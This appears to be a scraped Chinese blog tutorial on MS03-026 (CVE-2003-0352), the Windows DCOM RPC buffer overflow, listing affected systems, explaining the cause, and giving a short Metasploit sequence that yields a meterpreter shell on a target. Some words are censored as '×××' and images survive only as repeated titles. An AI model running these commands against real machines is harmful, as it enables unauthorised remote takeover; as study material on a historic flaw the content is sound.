ms03-026漏洞原理與復現

漏洞描述

此漏洞由lds-pl.net漏洞研究組在2003年7月16日發現,漏洞及exp在網上公開後,網上出現了大量的×××實例,利用此漏洞的蠕蟲也大量出現。

漏洞編號

CVE-2003-0352

影響系統

Microsoft Windows XP Professional SP1
    Microsoft Windows XP Professional
    Microsoft Windows XP Home SP1
    Microsoft Windows XP Home
    Microsoft Windows XP
    Microsoft Windows NT 4.0SP6a
    Microsoft Windows NT 4.0SP6
    Microsoft Windows NT 4.0SP5
    Microsoft Windows NT 4.0SP4
    Microsoft Windows NT 4.0SP3
    Microsoft Windows NT 4.0SP2
    Microsoft Windows NT 4.0SP1
    Microsoft Windows NT 4.0
    Microsoft Windows 2003
    Microsoft Windows 2000SP3
    Microsoft Windows 2000SP2
    Microsoft Windows 2000SP1
    Microsoft Windows 2000

×××目標

使用DCOM接口的Windows RPC 服務器

漏洞原理

微軟修改dcerpc框架後造成本身的RPC框架來處理進程間的通訊。微軟的RPC框架在處理TCP/IP信息交換過程當中存在的畸形消息時,未正確處理,致使緩衝區溢出漏洞;此漏洞影響使用RPC框架的DCOM接口,DCOM接口用來處理客戶端機器發送給服務器的DCOM對象激活請求,如UNC路徑。

metasploit exp目標機器

Windows NT SP3-6a
Windows 2000
Windows XP
Windows 2003 Universal

metasploit利用ms03-026

use exploit/windows/dcerpc/ms03_026_dcom
set rhost <target ip>
run -j # 後臺運行×××
# 若是×××成功,將會直接返回meterpreter會話,不然,×××失敗。

×××成功:
ms03-026漏洞原理與復現
×××失敗:
ms03-026漏洞原理與復現html

概念概述

UNC路徑:Universal Naming Convention,通用命名規則;UNC路徑爲目錄的網絡路徑,如:\\10.129.10.1\c$\

參考文章

tomqq_cu 博客windows

相關文章
相關標籤/搜索